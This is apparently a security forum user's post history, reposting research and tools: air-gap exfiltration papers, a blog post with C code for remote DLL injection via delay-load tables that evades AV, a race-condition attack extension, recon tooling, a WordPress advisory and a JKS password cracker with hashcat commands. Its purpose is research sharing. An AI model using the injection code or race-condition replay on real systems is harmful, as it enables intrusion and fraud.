Jump to content

Nytro

Administrators
  • Posts

    18740
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. Air-Gap Research Page By Dr. Mordechai Guri Cyber-Security Research Center Ben-Gurion University of the Negev, Israel email: gurim@post.bgu.ac.il (linkedin) aIR-Jumper (Optical) "aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)" Mordechai Guri, Dima Bykhovsky‏, Yuval Elovici Paper: http://arxiv.org/abs/1709.05742 Video (infiltration): https://www.youtube.com/watch?v=auoYKSzdOj4 Video (exfiltration): https://www.youtube.com/watch?v=om5fNqKjj2M xLED (Optical) Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici. "xLED: Covert Data Exfiltration from Air-Gapped Networks via Router LEDs" Paper: https://arxiv.org/abs/1706.01140 Or: http://cyber.bgu.ac.il/advanced-cyber/system/files/xLED-Router-Guri_0.pdf Demo video: https://www.youtube.com/watch?v=mSNt4h7EDKo AirHopper (Electromagnetic) Mordechai Guri, Gabi Kedma, Assaf Kachlon, and Yuval Elovici. "AirHopper: Bridging the air-gap between isolated networks and mobile phones using radio frequencies." In Malicious and Unwanted Software: The Americas (MALWARE), 2014 9th International Conference on, pp. 58-67. IEEE, 2014. Guri, Mordechai, Matan Monitz, and Yuval Elovici. "Bridging the Air Gap between Isolated Networks and Mobile Phones in a Practical Cyber-Attack." ACM Transactions on Intelligent Systems and Technology (TIST) 8, no. 4 (2017): 50. Demo video: https://www.youtube.com/watch?v=2OzTWiGl1rM&t=20s BitWhisper (Thermal) Mordechai Guri, Matan Monitz, Yisroel Mirski, and Yuval Elovici. "Bitwhisper: Covert signaling channel between air-gapped computers using thermal manipulations." In Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 276-289. IEEE, 2015. Demo video: https://www.youtube.com/watch?v=EWRk51oB-1Y&t=15s GSMem (Electromagnetic) Mordechai Guri, Assaf Kachlon, Ofer Hasson, Gabi Kedma, Yisroel Mirsky, and Yuval Elovici. "GSMem: Data exfiltration from air-gapped computers over gsm frequencies." In 24th USENIX Security Symposium (USENIX Security 15), pp. 849-864. 2015. Demo video: https://www.youtube.com/watch?v=RChj7Mg3rC4 Fansmitter (Acoustic) Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "Fansmitter: Acoustic Data Exfiltration from (Speakerless) Air-Gapped Computers." arXiv preprint arXiv:1606.05915 (2016). Demo video: https://www.youtube.com/watch?v=v2_sZIfZkDQ DiskFiltration (Acoustic) Mordechai Guri,Yosef Solewicz, Andrey Daidakulov, Yuval Elovici. "Acoustic Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard-Drive Noise (‘DiskFiltration’)". European Symposium on Research in Computer Security (ESORICS 2017) pp 98-115 Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise." arXiv preprint arXiv:1608.03431 (2016). Demo video: https://www.youtube.com/watch?v=H7lQXmSLiP8 USBee (Electromagnetic) Mordechai Guri, Matan Monitz, and Yuval Elovici. "USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB." arXiv preprint arXiv:1608.08397 (2016). Demo video: https://www.youtube.com/watch?v=E28V1t-k8Hk LED-it-GO (Optical) Mordechai Guri, Boris Zadov, Yuval Elovici. "LED-it-GO: Leaking (A Lot of) Data from Air-Gapped Computers via the (Small) Hard Drive LED". Detection of Intrusions and Malware, and Vulnerability Assessment - 14th International Conference, DIMVA 2017: 161-184 Mordechai Guri, Boris Zadov, Eran Atias, and Yuval Elovici. "LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED." arXiv preprint arXiv:1702.06715 (2017). Demo video: https://www.youtube.com/watch?v=4vIu8ld68fc VisiSploit (Optical) Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "An optical covert-channel to leak data through an air-gap." In Privacy, Security and Trust (PST), 2016 14th Annual Conference on, pp. 642-649. IEEE, 2016. Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "VisiSploit: An Optical Covert-Channel to Leak Data through an Air-Gap." arXiv preprint arXiv:1607.03946 (2016). Attachment: PDF icon xLED-Router-Guri.pdf Link: http://cyber.bgu.ac.il/advanced-cyber/airgap
  2. The information security world is rich with information. From reviewing logs to analyzing malware, information is everywhere and in vast quantities, more than the workforce can cover. Artificial intelligence is a field of study that is adept at applying intelligence to vast amounts of data and deriving meaningful results. In this book, we will cover machine learning techniques in practical situations to improve your ability to thrive in a data driven world. With clustering, we will explore grouping items and identifying anomalies. With classification, we’ll cover how to train a model to distinguish between classes of inputs. In probability, we’ll answer the question “What are the odds?” and make use of the results. With deep learning, we’ll dive into the powerful biology inspired realms of AI that power some of the most effective methods in machine learning today. The Cylance Data Science team consists of experts in a variety of fields. Contributing members from this team for this book include Brian Wallace, a security researcher turned data scientist with a propensity for building tools that merge the worlds of information security and data science. Sepehr Akhavan-Masouleh is a data scientist who works on the application of statistical and machine learning models in cyber-security with a Ph.D from University of California, Irvine. Andrew Davis is a neural network wizard wielding a Ph.D in computer engineering from University of Tennessee. Mike Wojnowicz is a data scientist with a Ph.D. from Cornell University who enjoys developing and deploying large-scale probabilistic models due to their interpretability. Data scientist John H. Brock researches applications of machine learning to static malware detection and analysis, holds an M.S. in computer science from University of California, Irvine, and can usually be found debugging Lovecraftian open source code while mumbling to himself about the virtues of unit testing. Download: http://defense.ballastsecurity.net/static/IntroductionToArtificialIntelligenceForSecurityProfessionals_Cylance.pdf
  3. No Coin No coin is a tiny browser extension aiming to block coin miners such as Coinhive. You can grab the extension from: Chrome Web Store FireFox Add-on (coming soon) Why? Even though I think using coin mining in browser to monetize content is a great idea, abusing it is not. Some websites are running it during the entire browsing session which results in high consumption of your computers resources. I do believe that using it occasionally such as for the proof of work of a captcha is OK. But for an entire browsing session, the user should have the choice to opt-in which is the aim of this extension. Why not just block the URLs in an adblocker? The idea was to keep it separate from adblocking. Coin mining in the browser is a different issue. Where ads are tracking you and visually interfering with your browsing experience, coin mining, if abused, is eating your computer resources resulting in slow downs (from high CPU usage) and excessive power consumption. You might be OK with that and not with ads, or vice versa. Or you might just want to keep ads blocked entirely and just enable the coin mining script for a minute to pass a Captcha. That's why I believe having a separate extension is useful. How does it work? The extension is simply blocking a list of blacklisted domains in blacklist.txt. Clicking on the icon will display you a button to pause/unpause No Coin. If you are aware of any scripts or services that provide coin mining the browser, please submit a PR. Contribute Contributions are welcome! Don't hesitate to submit bug fixes, improvements and new features. Regarding new features, please have a look at the issues first. If a feature you whish to work on is not listed in here, you might want to add an issue first before starting to work on a PR. Made by Rafael Keramidas (keraf [at] protonmail [dot] com - @iamkeraf - ker.af). Image used for logo by Sandro Pereira. Sursa: https://github.com/keraf/NoCoin
      • 1
      • Upvote
  4. Chiar exista oameni care citesc "Terms and conditions"? Sau "Privacy policy".
  5. Abusing Delay Load DLLs for Remote Code Injection Sep 19th, 2017 I always tell myself that I’ll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motiviation to conduct more public research. I do love it. This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it’s simply another strategy for migrating into other processes. Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten various methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we’re not touching the IAT and we don’t require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I’ll detail below. Delay Load DLL Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that’s fixed-up on first call. This process can be better illuminated by the following, decades old figure below: This image comes from a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I’ll attempt to distill it here. Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK: 1 2 3 4 5 6 7 8 9 10 11 struct InternalImgDelayDescr { DWORD grAttrs; // attributes LPCSTR szName; // pointer to dll name HMODULE * phmod; // address of module handle PImgThunkData pIAT; // address of the IAT PCImgThunkData pINT; // address of the INT PCImgThunkData pBoundIAT; // address of the optional bound IAT PCImgThunkData pUnloadIAT; // address of optional copy of original IAT DWORD dwTimeStamp; // 0 if not bound, // O.W. date/time stamp of DLL bound to (Old BIND) }; The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 0:022> lm m explorer start end module name 00690000 00969000 explorer (pdb symbols) 0:022> !dh 00690000 -f File Type: EXECUTABLE IMAGE FILE HEADER VALUES [...] 68A80 [ 40] address [size] of Load Configuration Directory 0 [ 0] address [size] of Bound Import Directory 1000 [ D98] address [size] of Import Address Table Directory AC670 [ 140] address [size] of Delay Import Directory 0 [ 0] address [size] of COR20 Header Directory 0 [ 0] address [size] of Reserved Directory The first entry and it’s delay linked DLL can be seen in the following: 1 2 3 4 5 0:022> dd 00690000+ac670 l8 0073c670 00000001 000ac7b0 000b24d8 000b1000 0073c680 000ac8cc 00000000 00000000 00000000 0:022> da 00690000+000ac7b0 0073c7b0 "WINMM.dll" This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the psuedo IAT by using GetProcAddress to locate the desired function and patching the table at runtime. The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth. Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping it’s pseudo IAT entry: 1 2 3 0:022> dps 00690000+000b1000 l2 00741000 006dd0ac explorer!_imp_load__PlaySoundW 00741004 00000000 Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here: 1 2 3 4 5 6 7 8 9 10 0:022> u explorer!_imp_load__PlaySoundW explorer!_imp_load__PlaySoundW: 006dd0ac b800107400 mov eax,offset explorer!_imp__PlaySoundW (00741000) 006dd0b1 eb00 jmp explorer!_tailMerge_WINMM_dll (006dd0b3) explorer!_tailMerge_WINMM_dll: 006dd0b3 51 push ecx 006dd0b4 52 push edx 006dd0b5 50 push eax 006dd0b6 6870c67300 push offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670) 006dd0bb e8296cfdff call explorer!__delayLoadHelper2 (006b3ce9) The tailMerge function is a linker-generated stub that’s compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here’s the process of resolution of DnsAcquireContextHandle: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 0:000> dps 00060000+0001839c l2 0007839c 000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W 000783a0 00000000 0:000> bp DelayTest!__delayLoadHelper2 0:000> g ModLoad: 753e0000 7542c000 C:\Windows\system32\apphelp.dll Breakpoint 0 hit [...] 0:000> dd esp+4 l1 0024f9f4 00075ffc 0:000> dd 00075ffc l4 00075ffc 00000001 00010fb0 000183c8 0001839c 0:000> da 00060000+00010fb0 00070fb0 "DNSAPI.dll" 0:000> pt 0:000> dps 00060000+0001839c l2 0007839c 74dfd0fc DNSAPI!DnsAcquireContextHandle_W 000783a0 00000000 Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the pseudo IAT as both executable and writable: 1 2 3 4 0:011> !vprot 00060000+0001839c BaseAddress: 00371000 AllocationBase: 00060000 AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another additional twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state: 1 2 3 4 5 6 7 00741044 00726afa explorer!_imp_load__UnInitProcessPriv 00741048 7467f845 DUI70!InitThread 0074104c 00726b0f explorer!_imp_load__UnInitThread 00741050 74670728 DUI70!InitProcessPriv 0:022> lm m DUI70 start end module name 74630000 746e2000 DUI70 (pdb symbols) In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn’t loaded, it will be null. So when a delayed function is invoked that’s already loaded, the delay helper function will check it’s entry to determine if a handle to it can be used: 1 2 3 4 5 6 7 8 HMODULE hmod = *idd.phmod; if (hmod == 0) { if (__pfnDliNotifyHook2) { hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli))); } if (hmod == 0) { hmod = ::LoadLibraryEx(dli.szDll, NULL, 0); } The idd structure is just an instance of the InternalImgDelayDescr described above and passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from delay entry, then it uses that handle instead. It does NOT attempt to LoadLibrary irregardless of this value; this can be used to our advantage. Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample. Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you’d expect it, so we won’t be touching on it here. Limitations Before detailing how we might abuse this (though it should be fairly obvious), it’s important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so. The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well supported function of the portable executable, and exists today on modern systems. Another limitation is that, because at it’s core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, but none of which use LoadLibrary…). In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you’re using the suspended process/new process strategy, but may not be trivial on running applications. Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to be employing this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share. Abuse When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process. The running remote process is an interesting case with several caveats that we’ll explore below. I won’t detail suspended processes, as it’s essentially the same as a running process, but easier. It’s easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3]. Local Process The local process is the most simple and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though. The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio. With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 IMAGE_DELAYLOAD_DESCRIPTOR* findDelayEntry(char *cDllName) { PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL); PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew); PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos + pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress); DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL); IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL; // iterate over entries for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){ char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA); if (strcmp(_cDllName, cDllName) == 0){ pImgResult = entry; break; } } return pImgResult; } Should be pretty clear what we’re doing here. Once we’ve got the correct table entry, we need to mark the entry’s DllName as writable, overwrite it with our custom DLL name, and restore the protection mask: 1 2 3 4 5 IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll"); DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA); VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect); WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes); VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect); Now all that’s left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary. Remote Process The most interesting of cases is the running remote process. For demonstration here, we’ll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user. With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and it’s directories, and locate the appropriate delay entry we’re targeting. This part is likely to prove the most unfriendly when attempting to port this to another process; what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it’s delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected. When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer. The code for this is pretty simple: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 HRESULT hResult = S_FALSE; IShellDispatch *pIShellDispatch = NULL; CoInitialize(NULL); hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (void**)&pIShellDispatch); if (SUCCEEDED(hResult)) { pIShellDispatch->EjectPC(); pIShellDispatch->Release(); } CoUninitialize(); Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection. Remote Process – All Fixed One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost. Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it’s null, it attempts to load it, if it’s not, it uses that handle. We can abuse this check by nulling out the module handle, thereby “tricking” the helper function into once again loading that descriptor’s DLL. In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again. In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name. Conclusions I should make mention that I tested this strategy across several next gen AV/HIPS appliances, which will go unnamed here, and none where able to detect the cross process injection strategy. It would seem overall to be an interesting challenge at detection; in remote processes, the strategy uses the following chain of calls: 1 2 3 4 5 6 7 8 OpenProcess(..); ReadRemoteProcess(..); // read image ReadRemoteProcess(..); // read delay table ReadRemoteProcess(..); // read delay entry 1...n VirtualProtectEx(..); WriteRemoteProcess(..); That’s it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies. The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn’t production quality; beware, here be dragons. Special thanks to Stephen Breen for reviewing this post References [0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process [1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx [2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx [3] https://github.com/hatRiot/DelayLoadInject [4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx Posted by Bryan Alexander Sep 19th, 2017 Sursa: http://hatriot.github.io/blog/2017/09/19/abusing-delay-load-dll/
  6. Sakurity Racer This 128 LOC extension works pretty much as a "Make Money" button if used properly. LEGAL: Use at your own risk and only with your own projects. Do not use it against anyone else. Load this unpacked extension into your Chrome. We didn't upload it to the Chrome Store because for best results you need to run your own racer.js server anyway. See the circle on the right? It's the sniffer button. Once you click it, for next 3 seconds all requests (except ignored ones like OPTIONS) will be blocked and sent to specified default_server location where racer.js is running. Racer.js will get exact same request you were about to make along with all credentials and cookies and will repeat it to the victim in parallel (5 by default). That can trigger a race condition. No luck? Do it a few times because most race conditions are hard to reproduce. For basic tests you can run racer.js on your localhost and that will be used by default. For real pentest run it on a server as close to the victim as possible and change default_server inside sniffer.js. Best functionality to pentest: financial transfers, vouchers, discount codes, trade/withdraw functions and other actions that you're supposed to do limited amount of times. It doesn't cover all scenarios such as timed race conditions or when you need to run few different requests to achieve the result. Sursa: https://github.com/sakurity/racer
      • 2
      • Upvote
      • Thanks
  7. Kubebot: A Kubernetes Based Security Testing Slackbot Posted: 13 hours ago by @pentestit Leave a Comment 384 views About a week ago, I blogged about List of Portable Hardware Devices for Penetration Testing. The tool that I am blogging about today – Kubebot – can be an awesome example and be installed very easily on a Raspberry Pi that you have lying around. Best part is that this is open source and can be customized to do anything you want. What is Kubebot? Kubebot is an open source security testing Slackbot in the Go programming language, with a Kubernetes backend on the Google Cloud Platform. All of us know that Kubernetes is an open-source system for automating deployment, scaling, and management of dockerized applications. We also know that running tasks such as reconnaissance on a target network is almost always time-consuming and cumbersome. If you have a tool like Kubebot to help, you can use the time it does it’s stuff to concentrate on other important stuff. It dockerizes a lot of useful tools that help you perform reconnaissance on a target. List of tools included with Kubebot: Enumall: This is a custom implementation of the Enumall script by the author. It helps you identify subdomains using several techniques that relies on services such as threatcrowd, Bing, Shodan, HackerTraget and the famous Recon-NG. git-all-secrets: git-all-secrets is an open source tool by the author @anshuman_bh to capture all the GIT secrets by leveraging multiple open source GIT searching tools. Gitrob: Gitrob is an open source, command line tool which can help organizations and security professionals find sensitive information lingering in publicly available files on GitHub. git-secrets: The git-secrets open source tool scans commits, commit messages and alerts you of sensitive data that has been found. Gobuster: Gobuster is a tool used to brute-force URIs (directories and files) in web sites and DNS subdomains (with wildcard support). Nmap: All of us already know that Nmap aka Network Mapper is a free and open source utility for network discovery and security auditing. SubBrute: SubBrute is a DNS meta-query spider that enumerates DNS records, and subdomains. Sublist3r: Sublist3r is an open source python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting by enumerateing subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS. SubBrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. truffleHog: truffleHog is an open source tool that searches through GIT repositories for high entropy strings, digging deep into commit history and branches. This is effective at finding secrets accidentally committed that contain high entropy. Wfuzz: Wfuzz is a tool designed to brute force web applications. As of now, only basic authentication brute forcing has been implemented in Kubebot. Support for tools such as Metasploit is being worked upon. Installing the tool though lengthy, is a lot easy. Download Kubebot: Installation instruction along with it’s pre-requisites can be found here. You can check out the Kubebot GIT repository from here. Sursa: http://pentestit.com/kubebot-kubernetes-based-security-testing-slackbot/
  8. Cure53 Browser Security White Paper Welcome to the code repository for the Cure53 Browser Security White Paper! This is the right place to leave comments and file bugs in case we got something wrong. The latest version of the PDF will be available here as well. Expect frequent updates for smaller fixes and adjustments. Sursa: https://github.com/cure53/browser-sec-whitepaper
      • 1
      • Upvote
  9. WordPress 4.8.2 Security and Maintenance Release Posted September 19, 2017 by Aaron D. Campbell. Filed under Releases, Security. WordPress 4.8.2 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. WordPress versions 4.8.1 and earlier are affected by these security issues: $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi). WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability. Reported by Slavco A cross-site scripting (XSS) vulnerability was discovered in the oEmbed discovery. Reported by xknown of the WordPress Security Team. A cross-site scripting (XSS) vulnerability was discovered in the visual editor. Reported by Rodolfo Assis (@brutelogic) of Sucuri Security. A path traversal vulnerability was discovered in the file unzipping code. Reported by Alex Chapman (noxrnet). A cross-site scripting (XSS) vulnerability was discovered in the plugin editor. Reported by 陈瑞琦 (Chen Ruiqi). An open redirect was discovered on the user and term edit screens. Reported by Yasin Soliman (ysx). A path traversal vulnerability was discovered in the customizer. Reported by Weston Ruter of the WordPress Security Team. A cross-site scripting (XSS) vulnerability was discovered in template names. Reported by Luka (sikic). A cross-site scripting (XSS) vulnerability was discovered in the link modal. Reported by Anas Roubi (qasuar). Thank you to the reporters of these issues for practicing responsible disclosure. In addition to the security issues above, WordPress 4.8.2 contains 6 maintenance fixes to the 4.8 release series. For more information, see the release notes or consult the list of changes. Download WordPress 4.8.2 or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.8.2. Thanks to everyone who contributed to 4.8.2. Sursa: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  10. JKS private key cracker - Nail in the JKS coffin The Java Key Store (JKS) is the Java way of storing one or several cryptographic private and public keys for asymmetric cryptography in a file. While there are various key store formats, Java and Android still default to the JKS file format. JKS is one of the file formats for Java key stores, but JKS is confusingly used as the acronym for the general Java key store API as well. This project includes information regarding the security mechanisms of the JKS file format and how the password protection of the private key can be cracked. Due the unusual design of JKS the developed implementation can ignore the key store password and crack the private key password directly. Because it ignores the key store password, this implementation can attack every JKS configuration, which is not the case with most other tools. By exploiting a weakness of the Password Based Encryption scheme for the private key in JKS, passwords can be cracked very efficiently. Until now, no public tool was available exploiting this weakness. This technique was implemented in hashcat to amplify the efficiency of the algorithm with higher cracking speeds on GPUs. To get the theory part, please refer to the POC||GTFO article "15:12 Nail in the Java Key Store Coffin" in issue 0x15 included in this repository (pocorgtfo15.pdf) or available on various mirros like this beautiful one: https://unpack.debug.su/pocorgtfo/ Before you ask: JCEKS or BKS or any other Key Store format is not supported (yet). How you should crack JKS files The answer is build your own cracking hardware for it . But let's be a little more practical, so the answer is using your GPU: _____: _____________ _____: v3.6.0 ____________ _\ |__\______ _/_______ _\ |_____ _______\______ /__ ______ | _ | __ \ ____/____ _ | ___/____ __ |_______/ | | | \ _\____ / | | \ / \ | | |_____| |______/ / /____| |_________/_________: | |_____:-aTZ!/___________/ |_____: /_______: * BLAKE2 * BLOCKCHAIN2 * DPAPI * CHACHA20 * JAVA KEYSTORE * ETHEREUM WALLET * All you need to do is run the following command: java -jar JksPrivkPrepare.jar your_JKS_file.jks > hash.txt If your hash.txt ends up being empty, there is either no private key in the JKS file or you specified a non-JKS file. Then feed the hash.txt file to hashcat (version 3.6.0 and above), for example like this: $ ./hashcat -m 15500 -a 3 -1 '?u|' -w 3 hash.txt ?1?1?1?1?1?1?1?1?1 hashcat (v3.6.0) starting... OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 1080, 2026/8107 MB allocatable, 20MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Applicable optimizers: * Zero-Byte * Precompute-Init * Not-Iterated * Appended-Salt * Single-Hash * Single-Salt * Brute-Force Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 75c $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test:POC||GTFO Session..........: hashcat Status...........: Cracked Hash.Type........: JKS Java Key Store Private Keys (SHA1) Hash.Target......: $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test Time.Started.....: Tue May 30 17:41:58 2017 (8 mins, 25 secs) Time.Estimated...: Tue May 30 17:50:23 2017 (0 secs) Guess.Mask.......: ?1?1?1?1?1?1?1?1?1 [9] Guess.Charset....: -1 ?u|, -2 Undefined, -3 Undefined, -4 Undefined Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 7946.6 MH/s (39.48ms) Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 4014116700160/7625597484987 (52.64%) Rejected.........: 0/4014116700160 (0.00%) Restore.Point....: 